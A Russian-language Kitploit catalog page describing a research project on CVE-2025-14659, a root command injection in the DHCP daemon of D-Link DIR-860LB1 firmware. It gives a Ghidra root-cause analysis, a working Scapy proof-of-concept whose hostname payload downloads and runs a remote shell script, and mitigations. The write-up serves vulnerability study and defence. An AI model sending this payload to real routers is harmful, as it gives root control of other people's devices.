Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Vulnerability-DLink-CVE-2025-14659 — Статический анализ (Ghidra) и создание пользовательских пакетов (Scapy), демонстрирующие уязвимость внедрения команд DHCP на уровне root (CVE-2025-14659) в прошивке D-Link | Kitploit
Инструменты/GitHubGitHub/peterlinccl/vulnerability-dlink-cve-2025-14659
Безопасность встроенных системСтатический анализБезопасность IoTАнализ уязвимостейЭксплуатацияОбратная инженерияСтатьи и ИсследованияРазработка Полезной НагрузкиАнализ Прошивок

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHubpeterlinccl/vulnerability-dlink-cve-2025-14659

Vulnerability-DLink-CVE-2025-14659

Статический анализ (Ghidra) и создание пользовательских пакетов (Scapy), демонстрирующие уязвимость внедрения команд DHCP на уровне root (CVE-2025-14659) в прошивке D-Link

Репозиторий
14 ч 27 мин назадЕщё не проверено

CVE-2025-14659: Анализ внедрения команд в DHCP-демон D-Link

Recreate CVE Project | Offensive Security

Автор: Peter Lin
Дата: Май 2026
Описание проекта: CVE-2025-14659 сообщает об уязвимости внедрения команд в компоненте DHCP-демона, присутствующем в беспроводном маршрутизаторе D-Link DIR-860LB1 с прошивкой v203b03. Данное внедрение команд может позволить злоумышленнику выполнить произвольные команды с правами root на целевом маршрутизаторе, когда DHCP-клиент продлевает существующую аренду с вредоносным именем хоста. Я извлеку прошивку устройства DIR-860LB1 и выявлю уязвимость в DHCP-демоне (udhcpd) с помощью статического анализа в Ghidra. Затем я задействую эмуляционный движок, такой как FirmAE, для эмуляции среды этого маршрутизатора, демонстрируя proof of concept атаки на данную цель.


🔍 Обзор уязвимости

  • CVE ID: CVE-2025-14659
  • Оценка CVSS: 8.7 (Высокая)
  • Тип уязвимости: CWE-77 (Внедрение команд)
  • Целевой бинарный файл: udhcpd (DHCP-демон)
  • Воздействие: Неаутентифицированный доступ с правами root через локальную сеть.

🔬 Первопричина (статический анализ в Ghidra)

При рассмотрении функции udhcpd_main в Ghidra уязвимость находится прямо внутри блока case 3 (DHCPREQUEST):

  1. Извлечение: Демон извлекает DHCP Option 12 (Hostname) из пакета клиента с помощью get_option(auStack_254, 0xc).
  2. Конкатенация: Если имя хоста присутствует, оно напрямую помещается в строковый буфер через sprintf():
    root@kitploit:~
    sprintf(acStack_454,"usockc /var/mydlinkeventd_usock NEW_DEVICE,%s,%s,%s\n", acStack_5f4, pcVar15, piVar12);
    
  3. Выполнение: Затем приложение передаёт этот необработанный буфер напрямую в вызов system() без очистки символов оболочки:
    root@kitploit:~
    system(acStack_454);
    

Поскольку демон работает с правами root, добавление метасимволов оболочки (таких как ; или |) в имя хоста позволяет злоумышленнику выполнять произвольные системные команды.


🛠️ Скрипт proof of concept (cve_poc.py)

Этот рабочий скрипт на Scapy имитирует вредоносного клиента, запрашивающего продление аренды с внедрённой полезной нагрузкой в имени хоста:

root@kitploit:~
from scapy.all import *

# ===== Configuration =====
iface = "tap1_0"                          
mac_address = "0a:6f:8c:38:03:52"        
requested_ip = "192.168.0.150"            
dhcp_server_ip = "192.168.0.1"            
attacker_server = "192.168.0.150:12345"   
# =========================

# Injected Hostname Payload
hostname = f"; wget http://{attacker_server}/exploit.sh ; sh exploit.sh ;"
mac_bytes = bytes.fromhex(mac_address.replace(":", ""))

dhcp_request = (
    Ether(src=mac_address, dst="ff:ff:ff:ff:ff:ff") /
    IP(src="0.0.0.0", dst="255.255.255.255") /
    UDP(sport=68, dport=67) /
    BOOTP(chaddr=mac_bytes, xid=0x81de4932) /   
    DHCP(options=[
        ("message-type", "request"),
        ("requested_addr", requested_ip),
        ("server_id", dhcp_server_ip),
        ("hostname", hostname),
        "end"
    ])
)

print("[*] Sending malicious DHCP REQUEST...")
sendp(dhcp_request, iface=iface, verbose=True)
print("[*] Packet sent. Check HTTP server logs.")

⚠️ Реальное воздействие угрозы

При эксплуатации в реальных условиях злоумышленник может использовать эту уязвимость для:

  • Развёртывания ботнета: Установка вредоносных бинарных файлов непосредственно в энергозависимую память маршрутизатора (/tmp) для включения устройства в DDoS-сети.
  • Перехвата DNS: Перезапись внутренних настроек DNS для незаметного перенаправления локальных пользователей на вредоносные фишинговые сайты.
  • Бокового перемещения: Использование скомпрометированного граничного маршрутизатора в качестве внутренней точки опоры для сканирования и атаки на другие машины внутри локальной сети.
  • Постоянного контроля: Установка бэкдоров или манипулирование конфигурационными файлами для сохранения несанкционированного административного доступа в локальной среде.

🛑 Защитные меры

  • Предупреждение о жизненном цикле оборудования: D-Link классифицировала устройство DIR-860LB1 как снятое с производства (EoL). Официальных патчей от производителя для устранения этой проблемы не ожидается.
  • Компенсирующие меры безопасности:
    • Настройте изолированные границы VLAN с функциями строгой изоляции клиентов, чтобы ограничить неаутентифицированную видимость DHCP-эндпоинтов.
    • Систематически выводите из эксплуатации устаревшие маршрутизирующие устройства с истёкшим сроком поддержки и переходите на активно поддерживаемые аппаратные конфигурации.

📚 Ссылки

  • NIST National Vulnerability Database
  • CVEDetails Vulnerability Profile

Отказ от ответственности: Этот проект создан строго в образовательных целях, для формирования портфолио и исследований в области защитной безопасности.

Скачать инструмент